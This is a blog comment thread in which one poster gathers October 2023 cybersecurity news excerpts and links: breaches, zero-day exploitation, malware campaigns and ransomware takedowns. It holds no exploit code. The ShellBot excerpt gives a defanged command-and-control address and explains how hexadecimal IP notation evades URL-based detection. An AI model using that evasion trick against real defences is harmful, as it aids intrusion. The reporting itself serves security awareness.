This posting is here to collect cyber security news in October 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in October 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
265 Comments
Tomi Engdahl says:
23andMe hit with lawsuits after hacker leaks stolen genetics data https://www.bleepingcomputer.com/news/security/23andme-hit-with-lawsuits-after-hacker-leaks-stolen-genetics-data/
Genetic testing provider 23andMe faces multiple class action lawsuits in the U.S. following a large-scale data breach that is believed to have impacted millions of its customers.
Late last month, a threat actor leaked 23andMe customer data in a CSV file named ‘Ashkenazi DNA Data of Celebrities.csv’ on hacker forums.
The file allegedly contained the data of nearly 1 million Ashkenazi Jews who used 23andMe services to find their ancestry info, genetic predispositions, and more.
Tomi Engdahl says:
Ubuntu discovers ‘hate speech’ in release 23.10 — how to upgrade?
https://www.bleepingcomputer.com/news/security/ubuntu-discovers-hate-speech-in-release-2310-how-to-upgrade/
Ubuntu, the most popular Linux distribution, has pulled its Desktop release
23.10 after its Ukrainian translations were discovered to contain hate speech.
According to the Ubuntu project, a malicious contributor is behind anti-Semitic, homophobic, and xenophobic slurs that were injected into the distro via a “third party tool” that lives outside of the Ubuntu Archive.
Tomi Engdahl says:
Women Political Leaders Summit targeted in RomCom malware phishing https://www.bleepingcomputer.com/news/security/women-political-leaders-summit-targeted-in-romcom-malware-phishing/
A new, lightweight variant of the RomCom backdoor was deployed against participants of the Women Political Leaders (WPL) Summit in Brussels, a summit focusing on gender equality and women in politics.
The campaign used a fake website mimicking the official WPL portal to bait people seeking to attend or simply interested in the summit.
A Trend Micro report analyzing the new variant warns that its operators, tracked by the firm as ‘Void Rabisu,’ have been using a stealthier backdoor with a new TLS-enforcement technique in the C2 (command and control) communications to make discovery harder.
Tomi Engdahl says:
ShellBot Cracks Linux SSH Servers, Debuts New Evasion Tactic https://www.darkreading.com/cloud/shellbot-cracks-linux-ssh-servers-debuts-new-evasion-tactic
Cyberattackers are targeting Linux SSH servers with the ShellBot malware, and they have a new method for hiding their activity: using hexadecimal IP (Hex
IP) addresses to evade behavior-based detection.
According to researchers at the AhnLab Security Emergency Response Center (ASEC), the threat actors are translating the familiar “dot-decimal”
command-and-control URL formation (i.e., hxxp://39.99.218[.]78,) into a Hex IP address format (such as hxxp://0x2763da4e/), which most URL-based detection signatures won’t parse or flag.
“IP addresses can be expressed in formats other than the dot-decimal notation, including decimal and hexadecimal notations, and are generally compatible with widely used Web browsers,” according to the ASEC advisory on the Hex IP attacks. “Due to the usage of curl for the download and its ability to support hexadecimal just like Web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl.”
Tomi Engdahl says:
Signal Debunks Zero-Day Vulnerability Reports, Finds No Evidence https://thehackernews.com/2023/10/signal-debunks-zero-day-vulnerability.html
Encrypted messaging app Signal has pushed back against “viral reports” of an alleged zero-day flaw in its software, stating it found no evidence to support the claim.
“After responsible investigation *we have no evidence that suggests this vulnerability is real* nor has any additional info been shared via our official reporting channels,” it said in a series of messages posted in X (formerly Twitter).
Signal said it also checked with the U.S. government and that it found no information to suggest “this is a valid claim.” It’s also urging those with legitimate information to send reports to security@signal[.]org.
Tomi Engdahl says:
Fake ‘RedAlert’ rocket alert app for Israel installs Android spyware https://www.bleepingcomputer.com/news/security/fake-redalert-rocket-alert-app-for-israel-installs-android-spyware/
Israeli Android users are targeted by a malicious version of the ‘RedAlert – Rocket Alerts’ app that, while it offers the promised functionality, acts as spyware in the background.
RedAlert – Rocket Alerts is a legitimate open-source app used by Israeli citizens to receive notifications of incoming rockets targeting the country.
The app is highly popular, with over a million downloads on Google Play.
Since Hamas terrorists launched their attack in South Israel last week, involving thousands of rockets, interest in the app has exploded as people sought timely warnings about incoming airstrikes in their area.
According to Cloudflare, hackers of unknown motivation and origin are leveraging the elevated interest in the app and the fear of the attacks to distribute a fake version that installs spyware.
Tomi Engdahl says:
DarkGate malware spreads through compromised Skype accounts https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/
Between July and September, DarkGate malware attacks have used compromised Skype accounts to infect targets through messages containing VBA loader script attachments.
According to Trend Micro security researchers who spotted the attacks, this script downloads a second-stage AutoIT script designed to drop and execute the final DarkGate malware payload.
“Access to the victim’s Skype account allowed the actor to hijack an existing messaging thread and craft the naming convention of the files to relate to the context of the chat history,” Trend Micro said.
“It’s unclear how the originating accounts of the instant messaging applications were compromised, however is hypothesized to be either through leaked credentials available through underground forums or the previous compromise of the parent organization,”
Tomi Engdahl says:
CISA, FBI urge admins to patch Atlassian Confluence immediately https://www.bleepingcomputer.com/news/security/cisa-fbi-urge-admins-to-patch-atlassian-confluence-immediately/
CISA, FBI, and MS-ISAC warned network admins today to immediately patch their Atlassian Confluence servers against a maximum severity flaw actively exploited in attacks.
Tracked as CVE-2023-22515, this critical privilege escalation flaw affects Confluence Data Center and Server 8.0.0 and later and is remotely exploitable in low-complexity attacks that don’t require user interaction.
Those who couldn’t upgrade were urged to shut down impacted instances or isolate them from Internet access. Admins were also advised to check for indicators of compromise, including new or suspicious admin user accounts.
Tomi Engdahl says:
Hackers steal sensitive info of thousands of Sony employees https://www.pandasecurity.com/en/mediacenter/mobile-news/sony-employees-hack/
Last month, a cyber group linked to a Russian-speaking CL0P cyber gang said they managed to hack the Japanese multinational conglomerate and were looking to give the stolen materials to the highest bidder on the dark web.
The group stated they tried to ask for ransom, but Sony refused to cooperate, so the hackers were looking at other ways to monetize. The fraudsters published multiple materials confirming the stolen data was genuine, but whether they managed to sell it on the dark web remains unknown.
Tomi Engdahl says:
Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure https://thehackernews.com/2023/10/discord-playground-for-nation-state.html
In what’s the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray in leveraging the social platform for targeting critical infrastructure.
Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.
“The usage of Discord is largely limited to information stealers and grabbers that anyone can buy or download from the Internet,” Trellix researchers Ernesto Fernández Provecho and David Pastor Sanz said in a Monday report.
But that may be changing, for the cybersecurity firm said it found evidence of an artifact targeting Ukrainian critical infrastructures. There is currently no evidence linking it to a known threat group.
“”The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape,”
the researchers noted.
Tomi Engdahl says:
CERT-UA Reports: 11 Ukrainian Telecom Providers Hit by Cyberattacks https://thehackernews.com/2023/10/cert-ua-reports-11-ukrainian-telecom.html
The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that threat actors “interfered” with at least 11 telecommunication service providers in the country between May and September 2023.
The agency is tracking the activity under the name UAC-0165, stating the intrusions led to service interruptions for customers.
The starting point of the attacks is a reconnaissance phase in which a telecom company’s network is scanned to identify exposed RDP or SSH interfaces and potential entry points.
“It should be noted that reconnaissance and exploitation activities are carried out from previously compromised servers located, in particular, in the Ukrainian segment of the internet,” CERT-UA said.
Tomi Engdahl says:
Thousands of Cisco IOS XE devices hacked in widespread attacks https://www.bleepingcomputer.com/news/security/thousands-of-cisco-ios-xe-devices-hacked-in-widespread-attacks/
Attackers have exploited a recently disclosed critical zero-day bug to compromise and infect thousands of Cisco IOS XE devices with malicious implants.
According to threat intelligence company VulnCheck, the maximum severity vulnerability (CVE-2023-20198) has been extensively exploited in attacks targeting Cisco IOS XE routers and switches with the Web User Interface (Web
UI) feature enabled, that also have the HTTP or HTTPS Server feature toggled on.
VulnCheck scanned internet-facing Cisco IOS XE web interfaces and discovered thousands of compromised and infected hosts. The company has also released a scanner to detect these implants on affected devices.
Tomi Engdahl says:
Fraudsters target Booking.com customers claiming hotel stay could be cancelled https://grahamcluley.com/fraudsters-target-booking-com-customers-claiming-hotel-stay-could-be-cancelled/
One of the world’s largest online travel agencies, Booking.com, is being used by fraudsters to trick hotel guests into handing over their payment card details.
The online booking went smoothly as you would expect. But on Friday, two weeks after I made the original booking, I received a notification from the Booking.com smartphone app that I had a new message from the hotel I was planning to stay at.
I looked in the app, and sure enough I had a message from the “hotel”, straight after a legitimate message from the hotel. It also appears on the website version of Booking.com.
Tomi Engdahl says:
The forgotten malvertising campaign
https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign
In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.
We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.
In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.
Tomi Engdahl says:
Network Security
‘HTTP/2 Rapid Reset’ Zero-Day Exploited to Launch Largest DDoS Attacks in History
https://www.securityweek.com/rapid-reset-zero-day-exploited-to-launch-largest-ddos-attacks-in-history/
A zero-day vulnerability named HTTP/2 Rapid Reset has been exploited to launch some of the largest DDoS attacks in history.
Tomi Engdahl says:
https://www.securityweek.com/prove-identity-snags-40m-funding-for-id-verification-tech/
Tomi Engdahl says:
https://www.securityweek.com/anonybit-raises-3-million-for-biometric-authentication-platform/
Tomi Engdahl says:
ICS/OT
Critical Vulnerabilities Expose Weintek HMIs to Attacks
https://www.securityweek.com/critical-vulnerabilities-expose-weintek-hmis-to-attacks/
Weintek has patched critical and high-severity vulnerabilities found in its cMT series HMIs by industrial cybersecurity firm TXOne.
Tomi Engdahl says:
US Gov Expects Widespread Exploitation of Atlassian Confluence Vulnerability
https://www.securityweek.com/us-gov-expects-widespread-exploitation-of-atlassian-confluence-vulnerability/
CISA, FBI, and MS-ISAC warn of potential widespread exploitation of CVE-2023-22515, a critical vulnerability in Atlassian Confluence.
US cybersecurity agency CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) warn organizations of potential widespread exploitation of a recent zero-day vulnerability in Atlassian Confluence Data Center and Server.
Tracked as CVE-2023-22515 (CVSS score of 9.8), the bug has been exploited by a nation-state threat actor since September 14, roughly two weeks before Atlassian released patches for it.
Remotely exploitable without authentication, the flaw is described as a broken access control issue leading to privilege escalation. The issue impacts on-premises Confluence instances only.
“This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts,” CISA, FBI, and MS-ISAC note in an advisory (PDF).
Tomi Engdahl says:
https://www.securityweek.com/cisco-devices-hacked-via-ios-xe-zero-day-vulnerability/
Tomi Engdahl says:
WordPress Websites Hacked via Royal Elementor Plugin Zero-Day
https://www.securityweek.com/wordpress-websites-hacked-via-royal-elementor-plugin-zero-day/
A critical vulnerability in the Royal Elementor WordPress plugin has been exploited as a zero-day since August 30.
Security researchers are warning of a critical-severity vulnerability in the Royal Elementor Addons and Templates WordPress plugin that has been exploited as a zero-day for more than a month.
Developed by WP Royal, the plugin helps domain admins build their websites without any coding experience. Royal Elementor has more than 200,000 active installations on the WordPress marketplace.
The exploited bug, tracked as CVE-2023-5360 (CVSS score of 9.8), is described as an insufficient file type validation in the plugin’s upload function, allowing unauthenticated attackers to upload arbitrary files to vulnerable sites, leading to remote code execution.
The flaw impacts all Royal Elementor versions prior to 1.3.79 and, according to WordPress security firm Defiant, has been exploited in malicious attacks since at least August 30.
Tomi Engdahl says:
ICS/OT
Milesight Industrial Router Vulnerability Possibly Exploited in Attacks
https://www.securityweek.com/milesight-industrial-router-vulnerability-possibly-exploited-in-attacks/
A vulnerability affecting Milesight industrial routers, tracked as CVE-2023-43261, may have been exploited in attacks.
A vulnerability affecting some industrial routers made by Chinese IoT and video surveillance product maker Milesight may have been exploited in attacks, according to exploit and vulnerability intelligence firm VulnCheck.
Several UR-series industrial cellular routers from Milesight (Ursalink) are affected by CVE-2023-43261, a serious vulnerability exposing system log files, such as ‘httpd.log’.
The exposed logs contain passwords for administrators and other users, which can be leveraged by remote, unauthenticated attackers to gain unauthorized access to the targeted device. The passwords are not stored in plain text in the log files, but they can be easily cracked.
Researcher Bipin Jitiya recently disclosed details of the vulnerability and made public a proof-of-concept (PoC) exploit. He informed Milesight about his findings, but the vendor said it had been aware of the flaw and released patches before the researcher reached out.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-43261
Inside the Router: How I Accessed Industrial Routers and Reported the Flaws
Router Vulnerability Hunt, From Google Dorks to Firmware Emulation — The Full Story
https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
CVE-2023-43261 – PoC
Critical Vulnerability Exposes Sensitive Information and Enables Unauthorized Access in Milesight Routers
https://github.com/win3zz/CVE-2023-43261
Affected Products: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Routers that could also be vulnerable.
Affected Firmware: I’ve confirmed the patch for firmware v35.3.0.7. Earlier versions may be vulnerable, but vendor confirmation is needed. I have made the request, but I have not received a response yet.
Tomi Engdahl says:
https://hackaday.com/2023/10/13/this-week-in-security-curl-reveal-rapid-reset-ddos-and-libcue/
Tomi Engdahl says:
Vastaamo-jutun käsittely alkaa: Valtavalla syytteiden listalla 21 316 törkeän kiristyksen yritystä
https://www.kauppalehti.fi/uutiset/vastaamo-jutun-kasittely-alkaa-valtavalla-syytteiden-listalla-21316-torkean-kiristyksen-yritysta/99039def-82b8-4c5a-a6af-310f44957c40
Niin sanotun Vastaamo-jutun oikeuskäsittely on alkanut.
Syyttäjä on nostanut vangittuna olevalle Aleksanteri Kivimäelle syytteet törkeästä tietomurrosta, törkeän kiristyksen yrityksestä, 9 598 törkeästä yksityiselämää loukkaavan tiedon levittämisestä, 21 316 törkeän kiristyksen yrityksestä ja 20 törkeästä kiristyksestä.
Psykoterapiakeskus Vastaamon tietomurrossa kymmenien tuhansien suomalaisten tietoja vuosi internetiin saataville. Niitä käytettiin myös uusiin rikoksiin.
Tietomurto tuli julki lokakuussa 2020.
Tomi Engdahl says:
Recently patched Citrix NetScaler bug exploited as zero-day since August https://www.bleepingcomputer.com/news/security/recently-patched-citrix-netscaler-bug-exploited-as-zero-day-since-august/
A critical vulnerability tracked as CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices has been actively exploited as a zero-day since late August, security researchers announced.
The security issue is an information disclosure and received a fix last week.
It allows attackers to access secrets in appliances configured as gateways of authentication, authorization, and accounting (AAA) virtual servers.
In a security bulletin on October 10 with few technical details, Citrix strongly urged customers to install the available update without delay.
A report from Mandiant disclosed that it found signs of CVE-2023-4966 being exploited in the wild since August for stealing authentication sessions and hijacking accounts.
Tomi Engdahl says:
BlackCat Climbs the Summit With a New Tactic https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/
BlackCat operators recently announced new updates to their tooling, including a utility called Munchkin that allows attackers to propagate the BlackCat payload to remote machines and shares on a victim organization network. For the past two years, the BlackCat ransomware operators have continued to evolve and iterate their tooling as part of their ransomware-as-a-service (RaaS) business model.
As part of a recent investigation, Unit 42 researchers have acquired an instance of Munchkin that is unique, in that it is loaded in a customized Alpine virtual machine (VM). This new tactic of leveraging a customized VM to deploy malware has been gaining traction in recent months, allowing ransomware threat actors to use VMs to circumvent security solutions in deploying their malware payloads.
This publication details how this new utility works and sheds further light on the continued tactics used by BlackCat threat actors. In doing so, it is our sincere hope to motivate further effort by the information security industry to better defend against this evolving threat.
Tomi Engdahl says:
The Fake Browser Update Scam Gets a Makeover https://krebsonsecurity.com/2023/10/the-fake-browser-update-scam-gets-a-makeover/
One of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in the past few months. New research shows the attackers behind one such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.
Tomi Engdahl says:
Google Play Protect adds real-time scanning to fight Android malware https://www.bleepingcomputer.com/news/security/google-play-protect-adds-real-time-scanning-to-fight-android-malware/
Google has announced new, real-time scanning features for Google Play Protect that make it harder for malicious apps employing polymorphism to evade detection.
This represents a significant step toward enhancing safety for all Android users and aims to decrease malware infections on the platform.
Tomi Engdahl says:
Cybercrime
Three Months After Patch, Gov-Backed Actors Exploiting WinRAR Flaw
https://www.securityweek.com/three-months-after-patch-gov-backed-actors-exploiting-winrar-flaw/
Google says it is still catching government-backed groups linked to China and Russia launching WinRAR exploits in targeted attacks.
Tomi Engdahl says:
Vulnerabilities
Recent NetScaler Vulnerability Exploited as Zero-Day Since August
https://www.securityweek.com/recent-netscaler-vulnerability-exploited-as-zero-day-since-august/
Mandiant says the recently patched Citrix NetScaler vulnerability CVE-2023-4966 had been exploited as zero-day since August.
A recently patched critical-severity vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway had been exploited as a zero-day since August, Google’s Mandiant cybersecurity unit reports.
The issue, tracked as CVE-2023-4966 (CVSS score of 9.4), can be exploited without authentication to leak sensitive information from on-prem appliances that are configured as a Gateway or an AAA virtual server.
Citrix announced patches for this and a high-severity vulnerability in NetScaler ADC and Gateway on October 10, but made no mention of potential exploitation.
On Tuesday, however, the tech giant updated its advisory to warn customers of observed in-the-wild exploitation of CVE-2023-4966 and urge them to update their instances as soon as possible.
The flaw was addressed in NetScaler ADC and NetScaler Gateway versions 14.1-8.50, 13.1-49.15, and 13.0-92.19, and in NetScaler ADC versions 13.1-FIPS 13.1-37.164, 12.1-FIPS 12.1-55.300, and 12.1-NDcPP 12.1-55.300.
Tomi Engdahl says:
Malware & Threats
Tens of Thousands of Cisco Devices Hacked via Zero-Day Vulnerability
https://www.securityweek.com/tens-of-thousands-of-cisco-devices-hacked-via-zero-day-vulnerability/
Tens of thousands of Cisco devices have reportedly been hacked via the exploitation of the zero-day vulnerability CVE-2023-20198.
Tens of thousands of Cisco devices have reportedly been hacked through the exploitation of the newly disclosed IOS XE zero-day vulnerability tracked as CVE-2023-20198.
Cisco warned customers on Monday that a critical IOS XE zero-day has been exploited by threat actors to gain elevated privileges on devices. The company is working on a patch and in the meantime it has urged customers to implement mitigations.
The vulnerability impacts the IOS XE web user interface, which is delivered with the default image, and it allows a remote, unauthenticated attacker to add level 15 access accounts that provide complete control over the targeted system.
Cisco said it had seen two activity clusters involving exploitation of the vulnerability: one that started in mid-September and one that began in mid-October. Both operations are believed to have been carried out by the same threat actor, which initially tested its code and then started delivering an implant that enabled it to execute arbitrary commands at system or IOS level.
In some cases, the hackers delivered the implant by exploiting an older IOS XE vulnerability tracked as CVE-2021-1435, but the malware was also observed on devices that have been patched against CVE-2021-1435 and the delivery mechanism remains unknown.
Vulnerabilities
Cisco Devices Hacked via IOS XE Zero-Day Vulnerability
https://www.securityweek.com/cisco-devices-hacked-via-ios-xe-zero-day-vulnerability/
Cisco is warning customers that a new IOS XE zero-day vulnerability tracked as CVE-2023-20198 is being exploited to hack devices.
Cisco is warning customers that a new zero-day vulnerability impacting the company’s IOS XE software is being exploited to hack devices.
The critical vulnerability is tracked as CVE-2023-20198 and it has been described as a privilege escalation issue impacting the IOS XE web user interface, which comes with the default image. A remote, unauthenticated attacker can exploit the vulnerability to create an account that has the highest privileges — level 15 access — and use it to take control of the device.
Tomi Engdahl says:
Joseph Cox / 404 Media:
Experts say misinformation from “verified” pseudo-OSINT accounts on X, driven by profit and engagement, is destroying the Israel-Hamas war information ecosystem — Join the newsletter to get the latest updates. — Success — Great! Check your inbox and click the link. — Error
‘Verified’ OSINT Accounts Are Destroying the Israel-Palestine Information Ecosystem
https://www.404media.co/twitter-verified-osint-accounts-are-destroying-the-israel-palestine-information-ecosystem/
The problem with profit and engagement driven misinformation from pseudo-OSINT accounts during the Israel-Palestine conflict is “unprecedented.” One expert said after Musk’s recent changes “all hell broke loose.”
Shortly after Russia invaded Ukraine in February 2022, many people across the world were first introduced to the term “OSINT,” which stands for open source intelligence. The practice of using photographs posted to social media, free-to-access satellite images, and other readily available sources of information to confirm where, how, and when important world events took place has existed for many years, but has been popularized during the biggest conflicts as more people signed up to social networks, which allowed anyone with an internet connection to participate in or consume it.
OSINT’s appeal is obvious. Rather than relying on government sources and narratives, and with new access to information on the internet, outside organizations or experts could attempt to confirm or deny those claims for themselves. Early on in Russia’s invasion, for example, Bellingcat, a non-profit organization that uses OSINT in many of its investigations, showed that Russia used cluster munitions in urban areas which resulted in civilian deaths. Bellingcat is known for its rigorous approach to OSINT and has repeatedly used OSINT techniques to break news on important global crises including the downing of Malaysian Airlines flight 17, the Syrian Civil War, the Christchurch shooting, and the January 6 insurrection.
OSINT is a useful way to try and verify claims, and 404 Media sometimes uses it in the course of its reporting. One of the reasons OSINT is so popular is because it is accessible to anyone, though experienced groups often use more sophisticated techniques than others. Major newsrooms have increasingly hired people specifically for their own OSINT teams. But what the current war in Israel and Gaza has made clear in recent days is that there are many verified, popular accounts on Twitter that use the OSINT term to give legitimacy to shoddy work that only creates more confusion. What exists now is a profit and engagement driven ecosystem of non-experts who in some cases may be spreading videos for the clout and cash, rather than to inform readers about what is actually true. One respected OSINT expert, known as Obretix, told 404 Media that Twitter now is “self promoting aggregators, posting thousands of tweets to get some revenue share from Elon.”
And everyone stands to lose when the quality of information on Twitter makes it harder for ordinary readers, or even some experts, to understand what is true and what is not. Paweł Wójcik, who has been an analyst on Twitter for years with a particular focus on terrorist groups such as Al Qaeda and the Islamic State, told 404 Media in an online chat that “there has always been misinformation and fakes, however for people who have been observing wars on this platform for over a decade, today’s problem is unprecedented.”
Today, Twitter is a very different space. Wójcik pointed to Elon Musk’s various changes around revoking bans of previously suspended users, the “mass overcrowding” of verified users (people are able to simply pay for a blue check now), and Musk’s introduced “incentives to spread misinformation in order to get paid for views.” One of Twitter’s changes, rolled out in June, is that people who pay to be verified on the site can now generate revenue based on the engagement they receive from other paying, verified users. After these, Wójcik said “all hell broke loose.”
Searching Twitter for “OSINT” yields hundreds of users with “OSINT” in their username or bio. It can be exceptionally difficult at first glance to tell who is an expert and who is not.
Within Twitter’s current profit and engagement focused ecosystem, the weapons specialist and OSINT expert known as Calibre Obscura generalized that “this entire space is 90% grifters.” The reason: “profit and the dopamine of likes and follows.” Calibre Obscura did also criticize mainstream outlets, but for another reason: the rush to get the story.
At the moment, many of these newer accounts consist of people reposting material taken from Telegram, Calibre Obscura added. Telegram has been a direct funnel for on-the-ground material in both Israel and Gaza. But when people then lift that material and post it to Twitter, it is “usually without context and usually with their own bias inserted,” Calibre Obscura told 404 Media.
Given their specialism on firearms, Calibre Obscura said they have seen bad OSINT on weapons specifically. “Claims that Ukraine supplied weapons to Hamas (lie) or that Wagner somehow helped Hamas (lie). It’s barely OSINT, it’s more like just lies to see what fits,” they said.
“It just creates more noise and less signal,” they said. “We need more actual journalism, verified information and less rumor mill. That’s where I see my role and other OSINTers like Bellingcat.”
Tomi Engdahl says:
Carly Page / TechCrunch:
Google says that government-backed hackers linked to Russia and China are exploiting a since-patched zero-day in WinRAR, discovered by Group-IB in August 2023 — Google security researchers say they have found evidence that government-backed hackers linked to Russia and China are exploiting …
Russia and China-backed hackers are exploiting WinRAR zero-day bug
https://techcrunch.com/2023/10/18/russia-sandworm-fancy-bear-china-winrar-zero-day/
Google security researchers say they have found evidence that government-backed hackers linked to Russia and China are exploiting a since-patched vulnerability in WinRAR, the popular shareware archiving tool for Windows.
The WinRAR vulnerability, first discovered by cybersecurity company Group-IB earlier this year and tracked as CVE-2023-38831, allows attackers to hide malicious scripts in archive files that masquerade as seemingly innocuous images or text documents. Group-IB said the flaw was exploited as a zero-day — since the developer had zero time to fix the bug before it was exploited — as far back as April to compromise the devices of at least 130 traders.
Tomi Engdahl says:
RT Watson / The Block:
Chainalysis says recent media reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses” — – Chainalysis said some recent reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses.”
Chainalysis says some reports might be overestimating crypto’s role in terrorist financing
https://www.theblock.co/post/258284/chainalysis-says-some-reports-might-be-overestimating-cryptos-role-in-terrorist-financing
Chainalysis said some recent reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses.”
In the wake of the recent Hamas attack in Israel, crypto analytics firm Chainalysis said Wednesday that’s its been receiving lots of questions about how terrorist groups might be using cryptocurrency. But it said some reports about the supposed use might be overstating metrics and using “flawed analyses.”
“Although terrorism financing is a very small portion of the already very small portion of cryptocurrency transaction volume that is illicit, some terrorist organizations raise, store, and transfer funds using cryptocurrency,” it wrote in a blog post. “Terrorist organizations have historically used and will likely continue to use traditional, fiat-based methods such as financial institutions, hawalas, and shell companies as their primary financing vehicles.”
In the aftermath of Hamas’ terrorist attack on Israel various media outlets have sought to estimate the level of illicit crypto funds that may have been funneled into the offensive. Sen. Elizabeth Warren, D-Mass., along with more than a hundred other lawmakers, on Wednesday cited a report from the Wall Street Journal about Hamas’ suppose use of crypto and said she wants answers from the administration of President Joe Biden.
Tomi Engdahl says:
Reuters:
Meta introduces temporary limits on “potentially unwelcome or unwanted comments” on Facebook posts about the Israel-Hamas war for users “in the region”
Meta to limit some Facebook comments on Israeli, Palestinian posts
https://www.reuters.com/world/middle-east/meta-limit-some-facebook-comments-israeli-palestinian-posts-2023-10-18/
NEW YORK, Oct 18 (Reuters) – Facebook-owner Meta Platforms (META.O) on Wednesday introduced temporary measures to limit “potentially unwelcome or unwanted comments” on posts about the conflict between Israel and Hamas.
Meta said it will change the default setting for people who can comment on new and public Facebook posts created by users “in the region” to only their friends and followers, Meta said in an updated blog post.
A Meta spokesperson declined to specify how the company defined the region. Users can opt-out and change the setting at any time, Meta said.
Tomi Engdahl says:
Abner Li / 9to5Google:
Google updates Play Protect with real-time scanning at the code level, prompting users to scan unknown Android apps before sideloading, starting in India — To avoid detection, Google has found that malicious parties are looking beyond the Play Store to infect Android devices with malware.
Google Play Protect will prompt you to scan unknown apps before sideloading
https://9to5google.com/2023/10/18/google-play-protect-scan/
To avoid detection, Google has found that malicious parties are looking beyond the Play Store to infect Android devices with malware. In response, Google is updating Play Protect and extending its scan protections.
When you install apps via sideloading (outside of Google Play), Play Protect already runs real-time checks that leverage “existing scanning intelligence,” on-device machine learning, similarity comparisons, and other techniques. The company finds that “downloads directly through messaging apps” are a common origin, citing social engineering tactics.
Tomi Engdahl says:
GOVERNMENTCISA Now Flagging Vulnerabilities, Misconfigurations Exploited by Ransomware
https://www.securityweek.com/cisa-now-flagging-vulnerabilities-misconfigurations-exploited-by-ransomware/
CISA is now flagging vulnerabilities and misconfigurations that are known to be exploited in ransomware attacks.
The US cybersecurity agency CISA is stepping up its efforts to prevent ransomware by making it easier for organizations to learn about vulnerabilities and misconfigurations exploited in these attacks.
As part of its Ransomware Vulnerability Warning Pilot (RVWP) program launched in March, the agency has released two new resources to help organizations identify and eliminate security flaws and weaknesses known to be exploited by ransomware groups.
“Through the RVWP, CISA determines vulnerabilities that are commonly associated with known ransomware exploitation and warns critical infrastructure entities with those vulnerabilities, helping to enable mitigation before a ransomware incident occurs,” CISA notes.
The first of these resources is a new column in the Known Exploited Vulnerabilities catalog, which flags flaws that CISA is aware of being associated with ransomware campaigns.
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Tomi Engdahl says:
Carly Page / TechCrunch:
Law enforcement agencies, including from the US, the EU, and Japan, seize the RagnarLocker ransomware group’s dark web portal as part of an “ongoing action” — An international group of law enforcement agencies have seized the dark web portal used by the notorious RagnarLocker ransomware group, TechCrunch has learned.
RagnarLocker ransomware dark web site seized in international sting
https://techcrunch.com/2023/10/19/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cudGVjaG1lbWUuY29tLw&guce_referrer_sig=AQAAAHR-E7hoMwuYqYBJEk_lUMA84YEaIhu-iAlEBsNJJGn688Z-wAVJXVBNxkV5H8hoBjnHWUQ3GevQ7r-vN8pHcwx6vWXCKie_sa8E3Kuk8bjR16Rp7FIFGDqqerW1yzU1ithu_siVwgWJZ2ARiqYAmvK7N4kS0HrjVU6cXQmvFE7V
An international group of law enforcement agencies have seized the dark web portal used by the notorious RagnarLocker ransomware group, TechCrunch has learned.
A message on the RagnarLocker website now states that, “this service has been seized by a part of a coordinated international law enforcement action against the RagnarLocker group.” According to the seizure notice, the operation involved law enforcement agencies from the United States, the European Union and Japan.
The full scale of the operation is not yet known, and it’s unclear whether the gang’s infrastructure was also seized, if any arrests were made or whether any stolen funds have been recovered.
Tomi Engdahl says:
https://techcrunch.com/2023/10/18/hacker-leaks-millions-more-23andme-user-records-on-cybercrime-forum/?guccounter=1&fbclid=IwAR2L28rD1YS76XUn4g7Z4BxrEg93ivQJJ6XlOgEmUs9MlXipgDelgOlVKiQ
Tomi Engdahl says:
Cisco IOS XE vulnerability widely exploited in the wild https://www.malwarebytes.com/blog/news/2023/10/cisco-ios-xe-vulnerability-widely-exploited-in-the-wild
An authentication bypass affecting Cisco IOS X was disclosed on October 16, 2023. Researchers have found since then that the vulnerability is widely being exploited in the wild to help install implants on affected switches and routers.
Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.
Tomi Engdahl says:
Microsoft Warns of North Korean Attacks Exploiting JetBrains TeamCity Flaw https://thehackernews.com/2023/10/microsoft-warns-of-north-korean-attacks.html
North Korean threat actors are actively exploiting a critical security flaw in JetBrains TeamCity to opportunistically breach vulnerable servers, according to Microsoft.
The attacks, which entail the exploitation of CVE-2023-42793 (CVSS score:
9.8), have been attributed to Diamond Sleet (aka Labyrinth Chollima) and Onyx Sleet (aka Andariel or Silent Chollima).
It’s worth noting that both the threat activity clusters are part of the infamous North Korean nation-state actor known as Lazarus Group.
